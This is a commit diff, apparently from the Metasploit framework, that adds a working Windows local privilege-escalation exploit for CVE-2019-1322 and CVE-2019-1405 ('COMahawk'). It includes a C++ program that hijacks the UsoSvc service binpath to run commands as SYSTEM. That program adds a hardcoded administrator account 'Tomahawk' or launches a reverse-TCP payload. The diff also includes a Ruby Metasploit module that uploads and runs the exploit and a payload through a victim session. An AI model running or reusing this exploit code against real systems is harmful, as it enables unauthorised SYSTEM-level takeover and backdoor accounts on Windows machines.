First draft of windows comahawk priv esc
This commit is contained in:
parent
104710ca41
commit
8a9dd35793
Binary file not shown.
22
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
vendored
Executable file
22
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
vendored
Executable file
|
@ -0,0 +1,22 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 2013
|
||||
VisualStudioVersion = 12.0.21005.1
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-1322-EXE", "CVE-2019-1322-EXE.vcxproj", "{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Win32 = Debug|Win32
|
||||
Release|Win32 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.ActiveCfg = Debug|x64
|
||||
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.Build.0 = Debug|x64
|
||||
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.ActiveCfg = Release|x64
|
||||
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
149
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
vendored
Executable file
149
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
vendored
Executable file
|
@ -0,0 +1,149 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20191322EXE</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="cve-2019-1322.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
22
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
vendored
Executable file
22
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
vendored
Executable file
|
@ -0,0 +1,22 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="cve-2019-1322.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
108
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
vendored
Executable file
108
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
vendored
Executable file
|
@ -0,0 +1,108 @@
|
|||
#include <iostream> #REMOVE BEFORE RELEASE
|
||||
#include <atlbase.h> // CComPtr
|
||||
#include <Propvarutil.h>
|
||||
#include <string>
|
||||
#import "wshom.ocx" no_namespace, raw_interfaces_only // Error here is a bug. It will still compile
|
||||
|
||||
# define command_size 50
|
||||
const GUID guidObject = { 0x6d8ff8e7, 0x730d, 0x11d4, { 0xbf, 0x42, 0x00, 0xb0, 0xd0, 0x11, 0x8b, 0x56 } };
|
||||
|
||||
struct __declspec(uuid("6d8ff8d4-730d-11d4-bf42-00b0d0118b56"))
|
||||
IUPnPContainerManager : public IUnknown {
|
||||
virtual HRESULT __stdcall ReferenceContainer(wchar_t*) = 0;
|
||||
virtual HRESULT __stdcall UnReferenceContainer(wchar_t*) = 0;
|
||||
virtual HRESULT __stdcall CreateInstance(
|
||||
wchar_t* string1,
|
||||
GUID* guid1,
|
||||
GUID* guid2,
|
||||
IUnknown** pObject) = 0;
|
||||
virtual HRESULT __stdcall CreateInstanceWithProgID(
|
||||
wchar_t* string1,
|
||||
wchar_t* guid1,
|
||||
GUID* guid2,
|
||||
IUnknown** pObject) = 0;
|
||||
virtual HRESULT __stdcall Shutdown() = 0;
|
||||
|
||||
};
|
||||
|
||||
int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
|
||||
{
|
||||
wchar_t command[command_size];
|
||||
|
||||
wprintf(L"This is a test\n");
|
||||
wprintf(L"This is a test %s\n", argv[1]);
|
||||
CoInitialize(NULL);
|
||||
|
||||
HRESULT hr1, hr2 = 0, hr3 = 0, hr4 = 0;
|
||||
|
||||
IUPnPContainerManager* ContainerMgr;
|
||||
|
||||
hr1 = CoCreateInstance(guidObject, nullptr, CLSCTX_ALL, IID_PPV_ARGS(&ContainerMgr));
|
||||
|
||||
hr2 = ContainerMgr->ReferenceContainer((wchar_t*)L"apt69");
|
||||
|
||||
CLSID clsid;
|
||||
|
||||
CLSIDFromProgID(OLESTR("WScript.Shell"), &clsid);
|
||||
|
||||
IWshShell* WshInterface = nullptr;
|
||||
|
||||
auto ShellUUID = __uuidof(IWshShell);
|
||||
|
||||
hr3 = ContainerMgr->CreateInstance((wchar_t*)L"apt69", &clsid, &ShellUUID, (IUnknown**)&WshInterface);
|
||||
|
||||
int out;
|
||||
VARIANT s;
|
||||
InitVariantFromInt32(1, &s);
|
||||
VARIANT type;
|
||||
InitVariantFromBoolean(TRUE, &type);
|
||||
|
||||
if (argc > 1)
|
||||
{
|
||||
const wchar_t* msg[6] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c ", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
|
||||
|
||||
// const wchar_t* command = (std::wstring(msg[1]) + std::wstring(argv[1]) + std::wstring(L" &\"")).data();
|
||||
memset((void*) command, 0, command_size * sizeof(wchar_t));
|
||||
wsprintf(command, L"%s%s &\"", msg[1], argv[1]);
|
||||
|
||||
wprintf(L"command = %s\n", command);
|
||||
|
||||
printf("[\\] Progress: ");
|
||||
for (int i = 0; i < 6; i++)
|
||||
{
|
||||
if (i == 1)
|
||||
{
|
||||
wprintf(command);
|
||||
hr4 = WshInterface->Run(::SysAllocString(command), &s, &type, &out);
|
||||
}
|
||||
else
|
||||
{
|
||||
hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
|
||||
wprintf(msg[i]);
|
||||
}
|
||||
Sleep(3000);
|
||||
printf(" %d/6", i + 1);
|
||||
}
|
||||
|
||||
printf("\n[+] Command executed.");
|
||||
}
|
||||
else
|
||||
{
|
||||
//const wchar_t* msg[9] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net user /add Tomahawk RibSt3ak69 &\"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net localgroup administrators /add Tomahawk & \"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
|
||||
const wchar_t* msg[9] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\Users\\msfuser\\Desktop\\revtcpx64.exe &\"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net localgroup administrators /add Tomahawk & \"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
|
||||
|
||||
printf("[\\] Progress: ");
|
||||
for (int i = 0; i < 9; i++)
|
||||
{
|
||||
hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
|
||||
Sleep(3000);
|
||||
printf(" %d/9", i + 1);
|
||||
}
|
||||
|
||||
printf("\n[+] Hopefully Tomahawk:RibSt3ak69 is added as an admin.\n");
|
||||
}
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return 0;
|
||||
}
|
84
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/~AutoRecover.CVE-2019-1322-EXE.vcxproj
vendored
Executable file
84
external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/~AutoRecover.CVE-2019-1322-EXE.vcxproj
vendored
Executable file
|
@ -0,0 +1,84 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE20191322EXE</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="cve-2019-1322.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,199 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/post/common'
|
||||
require 'msf/core/post/file'
|
||||
require 'msf/core/post/windows/priv'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
|
||||
'Description' => %q(
|
||||
THis exploit uses two ulnerabilities to execute a command as an elevated user.
|
||||
The first uses the UPnP service to execute as a LOCAL SERVICE user and the
|
||||
second abuses a misconficuration to allow execution of LOCAL SERVICE accounts
|
||||
to run as system.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)
|
||||
'hoangprod', # PoC
|
||||
'bwatters-r7' # msf module
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows x64', { 'Arch' => ARCH_X64 }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 12 2019',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-1322'],
|
||||
['CVE', '2019-1405'],
|
||||
['EDB', '47684'],
|
||||
['URL', 'https://github.com/apt69/COMahawk'],
|
||||
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
|
||||
['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => 'False'
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXPLOIT_NAME',
|
||||
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
|
||||
OptString.new('PAYLOAD_NAME',
|
||||
[false, 'The filename for the payload to be used on the target host if (%RAND%.exe by default).', nil]),
|
||||
OptString.new('PATH',
|
||||
[false, 'Path to write binaries if (%TEMP% by default).', nil]),
|
||||
OptInt.new('EXECUTE_DELAY',
|
||||
[false, 'The number of seconds to delay before executing the exploit', 3])
|
||||
])
|
||||
end
|
||||
|
||||
def setup
|
||||
super
|
||||
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
|
||||
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
|
||||
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
|
||||
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
|
||||
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
|
||||
@payload_path = "#{temp_path}\\#{payload_name}"
|
||||
@exploit_path = "#{temp_path}\\#{exploit_name}"
|
||||
@payload_exe = generate_payload_exe
|
||||
end
|
||||
|
||||
def validate_active_host
|
||||
begin
|
||||
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
raise Msf::Exploit::Failed, 'Could not connect to session'
|
||||
end
|
||||
end
|
||||
|
||||
def validate_remote_path(path)
|
||||
unless directory?(path)
|
||||
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
|
||||
end
|
||||
end
|
||||
|
||||
def validate_target
|
||||
#
|
||||
# This needs to be better
|
||||
#
|
||||
if sysinfo['Architecture'] == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
|
||||
end
|
||||
if sysinfo['OS'] =~ /XP/
|
||||
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_destination(path)
|
||||
if file?(path)
|
||||
print_status("#{path} already exists on the target. Deleting...")
|
||||
begin
|
||||
file_rm(path)
|
||||
print_status("Deleted #{path}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error("Unable to delete #{path}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_exploit_destination
|
||||
ensure_clean_destination(exploit_path)
|
||||
end
|
||||
|
||||
def ensure_clean_payload_destination
|
||||
ensure_clean_destination(payload_path)
|
||||
end
|
||||
|
||||
def upload_exploit
|
||||
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2019-1322', 'CVE-2019-1322-EXE.exe')
|
||||
upload_file(exploit_path, local_exploit_path)
|
||||
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
|
||||
end
|
||||
|
||||
def upload_payload
|
||||
write_file(payload_path, payload_exe)
|
||||
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
|
||||
end
|
||||
|
||||
def execute_exploit
|
||||
sleep(datastore['EXECUTE_DELAY'])
|
||||
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
|
||||
begin
|
||||
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
|
||||
rescue Rex::TimeoutError => e
|
||||
vprint_status("This is normal.... needs to be fixed....")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_dll
|
||||
begin
|
||||
print_status('Checking target...')
|
||||
validate_active_host
|
||||
validate_target
|
||||
print_status('Target Looks Good... trying to start notepad')
|
||||
process = setup_process
|
||||
inject_magic(process)
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error(e.message)
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_exe
|
||||
begin
|
||||
validate_remote_path(temp_path)
|
||||
ensure_clean_exploit_destination
|
||||
ensure_clean_payload_destination
|
||||
upload_exploit
|
||||
upload_payload
|
||||
execute_exploit
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error(e.message)
|
||||
ensure_clean_exploit_destination
|
||||
ensure_clean_payload_destination
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
validate_active_host
|
||||
validate_target
|
||||
exploit_exe
|
||||
end
|
||||
end
|
||||
|
||||
attr_reader :exploit_name
|
||||
attr_reader :payload_name
|
||||
attr_reader :payload_exe
|
||||
attr_reader :temp_path
|
||||
attr_reader :payload_path
|
||||
attr_reader :exploit_path
|
||||
end
|
